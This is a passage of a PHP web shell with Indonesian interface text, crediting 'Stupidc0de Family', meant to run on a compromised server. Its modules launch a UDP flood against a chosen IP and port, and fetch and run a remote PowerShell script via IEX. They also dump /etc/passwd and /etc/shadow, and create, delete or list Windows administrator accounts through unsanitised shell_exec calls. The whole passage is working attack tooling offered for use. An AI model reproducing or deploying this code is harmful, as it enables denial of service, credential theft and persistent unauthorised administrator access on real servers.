720elseif (isset($_GET['x']) && ($_GET['x'] == 'killer')) {
721 ?>
722 <font color="white"><br/><br/><center><h3>IP Killer</h3>
723 <form method="POST">
724 <font color="#00ff7f">
725 <table border="4px" cellspacing="3px" height="14px">
726 <tr>
727 <td><font color="red">IP: </td>
728 <td><input type="text" name="ip" placeholder="IP"><br/></td>
729 </tr>
730 <tr>
731 <td><font color="red">Time: </td>
732 <td><input type="text" name="time" placeholder="Time"></td>
733 </tr>
734 <tr>
735 <td><font color="red">Port: </td>
736 <td><input type="text" name="port" placeholder="Port"></td>
737 </tr>
738 </table>
739 <br/><input type="submit" name="go" value="Attack">
740
741 </form>
742 <?
743 if (isset($_POST['ip']) && isset($_POST['time'])){
744 $myhost = 'http://'.$_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
745 $pack = 0;
746 $port = $_POST['port'];
747 $size = 1000;
748 $exec = $_POST['time'];
749 $host = $_POST['ip'];
750 $time = time();
751 $max = $time+$exec;
752 for($i = 0; $i < $size; $i++) { $mess .= rand(0, 9); }
753 while (1) {
754 if(time() > $max){
755 break;
756 }
757 $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
758 if($fp){
759 $pack++;
760 fwrite($fp, $mess);
761 fclose($fp);
762 }
763 }
764 echo '<br/><br/><center>'.round(($pack / 65) * 1024, 3).' MB </center>';
765 }
766 }
767
768elseif (isset($_GET['x']) && ($_GET['x'] == 'sherlock')) {
769 echo '<font color="#00ff7f"><br/><br/><center><h3>Sherlock</h3></font>';
770 $oc = PHP_OS;
771 if(stripos($oc, 'WIN') !== False){
772 $sherlock = system("powershell.exe -nop -c IEX (New-Object Net.WebClient).downloadstring('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1');Find-AllVulns");
773 }
774}
775
776elseif (isset($_GET['x']) && ($_GET['x'] == 'whois')) {
777 ?>
778 <font color="white"><br/><br/><center><h3>Intelligence Service</h3></font>
779 <br/><form method="POST">
780 <input type="text" name="domain">
781 <select name="Finder">
782 <option value="Whois">Whois </option>
783 <option value="Traceroute">Traceroute </option>
784 </select>
785 <input type="submit" name="finders" value="Find">
786 </form>
787 </center>
788
789 <?
790 $domain = $_POST['domain'];
791 if(isset($_POST['finders'])){
792 $course = $_POST['Finder'];
793 if($course == 'Whois'){
794 $fp = @fsockopen('whois.lacnic.net', 43, $errno, $errstr) or die("Socket Error " . $errno . " - " . $errstr);
795 fputs($fp, $domain . "\r\n");
796 $out = "";
797 while(!feof($fp)){
798 $out .= fgets($fp);
799 }
800 fclose($fp);
801 echo "<pre>\n" . $out . "\n</pre>\n";
802 }else{
803 $a = file_get_contents('http://2whois.ru/?t=traceroute&data='.$domain);
804 $newPrice = preg_match_all('#<pre>(.+?)</pre>#is', $a, $arr);
805 echo "<pre>"; print_r($arr[1][0]); "</pre>";
806 }
807 }
808}
809
810
811elseif (isset($_GET['x']) && ($_GET['x'] == 'grabc')) {
812 $oc = PHP_OS;
813 $win = file_get_contents('C:\Windows\System32\drivers\etc\hosts') or die(file_get_contents('C:\Windows\System64\drivers\etc\hosts'));
814 $pass = file_get_contents('/etc/passwd');
815 $shad = file_get_contents('/etc/shadow');
816 ?>
817 <font color="white"><br/><br/><center><h3>Config Grabber</h3></font>
818 <center><textarea rows="40" cols="70"><? if(stripos($oc, 'WIN') !== False){ echo $win; } else { echo $pass.'<br>'.$shad; } ?></textarea></center>
819 <?
820}
821
822if(isset($_GET['x']) && ($_GET['x'] == 'about')){
823 ?>
824 <center><h3>Thanks Stupidc0de Family</h3></center>
825 <?
826}
827
828
829 ///menu rdp
830if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
831
832 {
833 if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
834 {
835 ?><br/><br/>
836 <center>
837 <div id="content-left">
838 <form action="" method="post">
839 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
840 <tr>
841 <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
842 </tr>
843 <tr>
844 <td><font color="#00ff7f" class='kecew'>Username</font></td>
845 <td><font color="#00ff7f" class='kecew'> : </font></td>
846 <td><input type="text" class="bordergaya" name="username" required></td>
847 </tr>
848 <tr>
849 <td><font color="#00ff7f" class='kecew'>Password</font></td>
850 <td><font color="#00ff7f" class='kecew'> : </font></td>
851 <td><input type="text" class="bordergaya" name="password" required></td>
852 </tr>
853 <tr>
854 <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
855 </tr>
856 </table>
857 </form>
858 </div>
859 <br/>
860 <div id="content-left">
861 <form action="" method="post">
862 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
863 <tr>
864 <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
865 </tr>
866 <tr>
867 <td><font color="#00ff7f" class='kecew'>Username</font></td>
868 <td><font color="#00ff7f" class='kecew'> : </font></td>
869 <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
870 </tr>
871 <tr>
872 <td><font color="#00ff7f" class='kecew'>Password</font></td>
873 <td><font color="#00ff7f" class='kecew'> : </font></td>
874 <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
875 </tr>
876 <tr>
877 <td><font color="#00ff7f" class='kecew'>Action</font></td>
878 <td><font color="#00ff7f" class='kecew'> : </font></td>
879 <td>
880 <select name="aksi" class="bordergaya">
881 <option value="1">Tampilkan Username</option>
882 <option value="2">Hapus Username</option>
883 <option value="3">Ubah Password</option>
884 </select>
885 </td>
886 </tr>
887 <tr>
888 <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
889 </tr>
890 </table>
891 </form>
892 <br/>
893 </div>
894 </center></center></center>
895 <?php
896 if($_POST['submit'])
897 {
898 if($_POST['kshell']=="1")
899 {
900 $r_user = $_POST['username'];
901 $r_pass = $_POST['password'];
902 $cmd_cek_user = shell_exec("net user");
903 if(preg_match("/$r_user/", $cmd_cek_user)){
904 echo $gaya_root.$r_user." sudah ada".$o;
905 }else {
906 $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
907 $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
908 $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
909 $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
910 if($cmd_add_user){
911 echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
912 }else {
913 echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
914 }
915 echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
916 if($cmd_add_groups1){
917 echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
918 }else
919 if($cmd_add_groups2){
920 echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
921 }else
922 if($cmd_add_groups3){
923 echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
924 }else {
925 echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
926 }
927 echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
928 echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
929 echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
930 }
931
932
933 }
934 else if($_POST['kshell']=="2")
935 {
936 echo "<style>
937 .coeg{margin-left:30%;}
938 </style>";
939 if($_POST['aksi']=="1"){
940 echo "<pre class='coeg'>".shell_exec("net user");
941 }
942 else if($_POST['aksi']=="2")
943 {
944 $username = $_POST['rusername'];
945 $cmd_cek_user = shell_exec("net user");
946 if (!empty($username)){
947 if(preg_match("/$username/", $cmd_cek_user)){
948 $cmd_add_user = shell_exec("net user ".$username." /DELETE");
949 if($cmd_add_user){
950 echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
951 echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
952 }else {
953 echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
954 }
955 }else {
956 echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
957 }
958 }else {
959 echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
960 }
961 }
962 else if($_POST['aksi']=="3")
963 {
964 echo "<style>
965 .tengahaja{margin-left:35%}
966 </style>";
967 $username = $_POST['rusername'];
968 $password = $_POST['gantipw'];
969 $cmd_cek_user = shell_exec("net user");
970 if (!empty($username)){
971 if(preg_match("/$username/", $cmd_cek_user)){
972 $cmd_add_user = shell_exec("net user ".$username."");
973 if($cmd_add_user){
974 echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
975 }else {
976 echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
977 }
978 }else
979 {
980 echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
981 }
982 }else
983 {
984 echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
985 }
986 }
987 }
988
989 }
990 } else{
991 echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
992 }break;
993 }
994
995?>
996</body>